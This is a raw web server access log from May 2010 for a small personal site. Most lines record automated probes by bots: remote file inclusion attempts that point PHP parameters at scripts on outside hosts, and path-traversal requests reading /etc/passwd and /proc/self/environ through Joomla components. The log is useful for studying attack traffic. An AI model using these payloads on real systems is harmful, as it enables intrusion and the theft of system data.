64.27.53.238 - - [25/May/2010:03:52:30 -0500] "GET /logs/access_log.1271376000//atom.php5?page=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.27.53.238 - - [25/May/2010:03:52:44 -0500] "GET /logs/access_log.1271376000//atom.php5?page=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.195.112.180 - - [25/May/2010:03:52:58 -0500] "GET /logs/access_log.1201305600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
198.161.91.4 - - [25/May/2010:03:53:33 -0500] "GET /logs/access_log.1273363200//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
198.161.91.4 - - [25/May/2010:03:53:35 -0500] "GET /logs/access_log.1273363200//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
198.161.91.4 - - [25/May/2010:03:55:24 -0500] "GET /logs/access_log.1273017600//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
198.161.91.4 - - [25/May/2010:03:55:43 -0500] "GET /logs/access_log.1273017600//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
121.78.118.123 - - [25/May/2010:03:59:06 -0500] "GET //skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 316 "-""Mozilla/5.0"
121.78.118.123 - - [25/May/2010:03:59:11 -0500] "GET /logs/access_log.1273622400//skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
121.78.118.123 - - [25/May/2010:03:59:11 -0500] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.78.118.123 - - [25/May/2010:03:59:28 -0500] "GET //skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 316 "-""Mozilla/5.0"
121.78.118.123 - - [25/May/2010:03:59:32 -0500] "GET /logs/access_log.1273622400//skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
121.78.118.123 - - [25/May/2010:03:59:32 -0500] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.78.118.123 - - [25/May/2010:03:59:56 -0500] "GET /logs/access_log.1271894400//skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
121.78.118.123 - - [25/May/2010:03:59:56 -0500] "GET /logs/access_log.1272067200//skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
121.78.118.123 - - [25/May/2010:04:01:31 -0500] "GET /logs/access_log.1272067200//skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
121.78.118.123 - - [25/May/2010:04:01:36 -0500] "GET /logs/access_log.1271894400//skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
189.59.8.29 - - [25/May/2010:04:05:18 -0500] "GET //?_zb_path=http://www.skma.org/skmaorg/cache/.log/id.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
189.59.8.29 - - [25/May/2010:04:05:18 -0500] "GET /logs/access_log.1262822400//?_zb_path=http://www.skma.org/skmaorg/cache/.log/id.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
189.59.8.29 - - [25/May/2010:04:05:18 -0500] "GET /logs//?_zb_path=http://www.skma.org/skmaorg/cache/.log/id.txt???? HTTP/1.1" 200 6913 "-""Mozilla/5.0"
121.88.4.141 - - [25/May/2010:04:07:39 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
193.239.4.92 - - [25/May/2010:04:07:54 -0500] "GET /logs/access_log.1238803200//upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.813"
193.239.4.92 - - [25/May/2010:04:07:54 -0500] "GET //upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.813"
193.239.4.92 - - [25/May/2010:04:07:55 -0500] "GET /logs//upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-""libwww-perl/5.813"
196.36.153.253 - - [25/May/2010:04:07:56 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""-"
196.36.153.253 - - [25/May/2010:04:07:56 -0500] "GET //index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""-"
196.36.153.253 - - [25/May/2010:04:07:56 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 299 "-""-"
196.36.153.253 - - [25/May/2010:04:07:56 -0500] "GET //index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 294 "-""-"
72.55.146.200 - - [25/May/2010:04:08:42 -0500] "GET /logs//administrator/index2.php?mosConfig_absolute_path=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
72.55.146.200 - - [25/May/2010:04:08:42 -0500] "GET //administrator/index2.php?mosConfig_absolute_path=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
195.190.166.35 - - [25/May/2010:04:09:11 -0500] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://hotel.luzhniki.ru//components/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.65"
195.190.166.35 - - [25/May/2010:04:09:11 -0500] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://hotel.luzhniki.ru//components/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.65"
58.180.42.218 - - [25/May/2010:04:09:59 -0500] "GET /logs/access_log.1273622400%20%20/skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
121.88.4.141 - - [25/May/2010:04:10:24 -0500] "GET /logs//index.php?option=com_juser&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
121.88.4.141 - - [25/May/2010:04:10:24 -0500] "GET //index.php?option=com_juser&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
58.180.42.218 - - [25/May/2010:04:10:36 -0500] "GET /logs/access_log.1273622400%20%20/skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
87.250.255.243 - - [25/May/2010:04:12:33 -0500] "GET /logs/access_log.1189123200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.23.54.110 - - [25/May/2010:04:13:43 -0500] "GET //admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
94.23.54.110 - - [25/May/2010:04:13:43 -0500] "GET /logs//admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
94.23.54.110 - - [25/May/2010:04:13:43 -0500] "GET /logs/access_log.1271721600//admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
169.244.70.146 - - [25/May/2010:04:15:00 -0500] "GET //modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://pkill.interfree.it/id.jpg? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
200.226.134.29 - - [25/May/2010:04:15:00 -0500] "GET //index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""-"
200.226.134.29 - - [25/May/2010:04:15:00 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""-"
169.244.70.146 - - [25/May/2010:04:15:00 -0500] "GET /logs//modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://pkill.interfree.it/id.jpg? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
200.226.134.29 - - [25/May/2010:04:15:00 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 299 "-""-"
200.226.134.29 - - [25/May/2010:04:15:00 -0500] "GET //index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 294 "-""-"
121.78.118.123 - - [25/May/2010:04:15:32 -0500] "GET /logs/access_log.1273622400%20%20//skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 345 "-""Mozilla/5.0"
121.78.118.123 - - [25/May/2010:04:15:46 -0500] "GET /logs/access_log.1273622400%20%20//skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 345 "-""Mozilla/5.0"
83.149.110.112 - - [25/May/2010:04:16:05 -0500] "GET //admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.149.110.112 - - [25/May/2010:04:16:05 -0500] "GET /logs/access_log.1271721600//admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
83.149.110.112 - - [25/May/2010:04:16:05 -0500] "GET /logs//admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.73.147.90 - - [25/May/2010:04:16:43 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 360 "-""libwww-perl/5.831"
80.233.172.42 - - [25/May/2010:04:16:53 -0500] "GET /logs/access_log.1262822400//?_zb_path=http://www.skma.org/skmaorg/cache/.log/id.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
80.233.172.42 - - [25/May/2010:04:16:53 -0500] "GET //?_zb_path=http://www.skma.org/skmaorg/cache/.log/id.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
80.233.172.42 - - [25/May/2010:04:16:53 -0500] "GET /logs//?_zb_path=http://www.skma.org/skmaorg/cache/.log/id.txt???? HTTP/1.1" 200 6913 "-""Mozilla/5.0"
193.239.4.92 - - [25/May/2010:04:16:56 -0500] "GET /logs//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
193.239.4.92 - - [25/May/2010:04:16:57 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
213.186.117.208 - - [25/May/2010:04:20:30 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""-"
213.186.117.208 - - [25/May/2010:04:20:30 -0500] "GET //index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""-"
213.186.117.208 - - [25/May/2010:04:20:30 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 299 "-""-"
213.186.117.208 - - [25/May/2010:04:20:31 -0500] "GET //index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 294 "-""-"
207.46.199.183 - - [25/May/2010:04:24:36 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [25/May/2010:04:25:01 -0500] "GET /artwork/trunks.htm HTTP/1.0" 200 1275 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.88.4.141 - - [25/May/2010:04:27:43 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
121.88.4.141 - - [25/May/2010:04:27:44 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
121.88.4.141 - - [25/May/2010:04:27:44 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
89.212.236.114 - - [25/May/2010:04:28:15 -0500] "GET /index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 293 "-""libwww-perl/5.808"
66.98.216.61 - - [25/May/2010:04:29:55 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.205.76.135 - - [25/May/2010:04:30:26 -0500] "GET /logs/index.php?option=com_spsnewsletter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.205.76.135 - - [25/May/2010:04:30:26 -0500] "GET /index.php?option=com_spsnewsletter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
204.152.200.50 - - [25/May/2010:04:31:11 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
195.9.14.148 - - [25/May/2010:04:32:03 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 293 "-""Mozilla/5.0"
195.9.14.148 - - [25/May/2010:04:32:03 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 293 "-""libwww-perl/5.822"
195.9.14.148 - - [25/May/2010:04:32:04 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 293 "-"""
195.9.14.148 - - [25/May/2010:04:32:04 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-"""
195.9.14.148 - - [25/May/2010:04:32:06 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 298 "-""Mozilla/5.0"
195.9.14.148 - - [25/May/2010:04:32:07 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 298 "-""libwww-perl/5.822"
195.9.14.148 - - [25/May/2010:04:32:07 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 298 "-"""
195.9.14.148 - - [25/May/2010:04:32:07 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-"""
195.9.14.148 - - [25/May/2010:04:32:09 -0500] "GET /logs/access_log.1272585600/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.9.14.148 - - [25/May/2010:04:32:10 -0500] "GET /logs/access_log.1272585600/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 320 "-""libwww-perl/5.822"
195.9.14.148 - - [25/May/2010:04:32:10 -0500] "GET /logs/access_log.1272585600/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 320 "-"""
195.9.14.148 - - [25/May/2010:04:32:10 -0500] "GET /logs/access_log.1272585600/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-"""
87.250.255.243 - - [25/May/2010:04:33:18 -0500] "GET /logs/access_log.1179964800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.88.4.141 - - [25/May/2010:04:35:55 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
69.36.5.247 - - [25/May/2010:04:37:25 -0500] "GET /logs/lib/FSphp.php?FSPHP_LIB=http://oblspecstroi.ru///help/pages.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.831"
69.36.5.247 - - [25/May/2010:04:37:25 -0500] "GET /lib/FSphp.php?FSPHP_LIB=http://oblspecstroi.ru///help/pages.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.831"
94.75.208.153 - - [25/May/2010:04:37:28 -0500] "GET /logs/access_log.1217376000 HTTP/1.0" 404 298 "http://www.google.de/search?q=%22RoxTeam%22+rfi+bot&btnG=Suche&hl=de&rlz=1G1GGLQ_DEDE371&sa=2""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
94.75.208.153 - - [25/May/2010:04:37:28 -0500] "GET /favicon.ico HTTP/1.0" 404 283 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
94.75.208.153 - - [25/May/2010:04:37:31 -0500] "GET /logs/ HTTP/1.0" 200 6889 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
94.75.208.153 - - [25/May/2010:04:37:32 -0500] "GET /icons/blank.gif HTTP/1.0" 200 148 "http://tomdolan.pconline.com/logs/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
94.75.208.153 - - [25/May/2010:04:37:32 -0500] "GET /icons/back.gif HTTP/1.0" 200 216 "http://tomdolan.pconline.com/logs/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
94.75.208.153 - - [25/May/2010:04:37:32 -0500] "GET /icons/text.gif HTTP/1.0" 200 229 "http://tomdolan.pconline.com/logs/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
94.75.208.153 - - [25/May/2010:04:39:10 -0500] "GET /logs/access_log.1274745600 HTTP/1.0" 200 318798 "http://tomdolan.pconline.com/logs/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
87.250.255.243 - - [25/May/2010:04:41:43 -0500] "GET /logs/access_log.1243728000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.47 - - [25/May/2010:04:49:31 -0500] "GET /logs/access_log.1181606400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.47 - - [25/May/2010:04:49:47 -0500] "GET /logs/access_log.1187740800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.226.134.29 - - [25/May/2010:04:53:36 -0500] "GET //index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""-"
200.226.134.29 - - [25/May/2010:04:53:36 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""-"
200.226.134.29 - - [25/May/2010:04:53:37 -0500] "GET //index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 294 "-""-"
200.226.134.29 - - [25/May/2010:04:53:37 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 299 "-""-"
87.250.255.243 - - [25/May/2010:04:57:04 -0500] "GET /logs/access_log.1223078400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
204.152.200.50 - - [25/May/2010:04:57:11 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
204.152.200.50 - - [25/May/2010:04:57:11 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
204.152.200.50 - - [25/May/2010:04:57:11 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
66.98.216.61 - - [25/May/2010:04:57:46 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [25/May/2010:04:57:46 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [25/May/2010:04:57:46 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.195.112.180 - - [25/May/2010:04:58:36 -0500] "GET /logs/access_log.1228003200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.94.137.93 - - [25/May/2010:05:01:09 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.94.137.93 - - [25/May/2010:05:01:09 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.94.137.93 - - [25/May/2010:05:01:09 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.94.137.93 - - [25/May/2010:05:01:09 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.195.236 - - [25/May/2010:05:08:01 -0500] "GET /logs/access_log.1237852800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.212.236.114 - - [25/May/2010:05:09:21 -0500] "GET /index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 293 "-""libwww-perl/5.808"
87.250.255.243 - - [25/May/2010:05:12:27 -0500] "GET /costume/thmb6.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
204.188.235.66 - - [25/May/2010:05:15:32 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
204.188.235.66 - - [25/May/2010:05:15:32 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
204.188.235.66 - - [25/May/2010:05:16:18 -0500] "GET /logs/index2.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
204.188.235.66 - - [25/May/2010:05:16:18 -0500] "GET /index2.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
204.188.235.66 - - [25/May/2010:05:16:43 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
204.188.235.66 - - [25/May/2010:05:16:43 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
207.46.195.236 - - [25/May/2010:05:22:31 -0500] "GET /logs/access_log.1248480000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [25/May/2010:05:25:19 -0500] "GET /logs/access_log.1229731200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.98.216.61 - - [25/May/2010:05:26:14 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
66.98.216.61 - - [25/May/2010:05:26:14 -0500] "GET /logs/access_log.1273363200%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
66.98.216.61 - - [25/May/2010:05:26:14 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
66.98.216.61 - - [25/May/2010:05:26:15 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
66.98.216.61 - - [25/May/2010:05:26:15 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
66.98.216.61 - - [25/May/2010:05:26:15 -0500] "GET /logs/access_log.1273363200%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
74.55.135.18 - - [25/May/2010:05:26:41 -0500] "GET /logs/access_log.1273363200%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
74.55.135.18 - - [25/May/2010:05:26:41 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
74.55.135.18 - - [25/May/2010:05:26:41 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
74.55.135.18 - - [25/May/2010:05:26:41 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
74.55.135.18 - - [25/May/2010:05:26:41 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
74.55.135.18 - - [25/May/2010:05:26:41 -0500] "GET /logs/access_log.1273363200%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
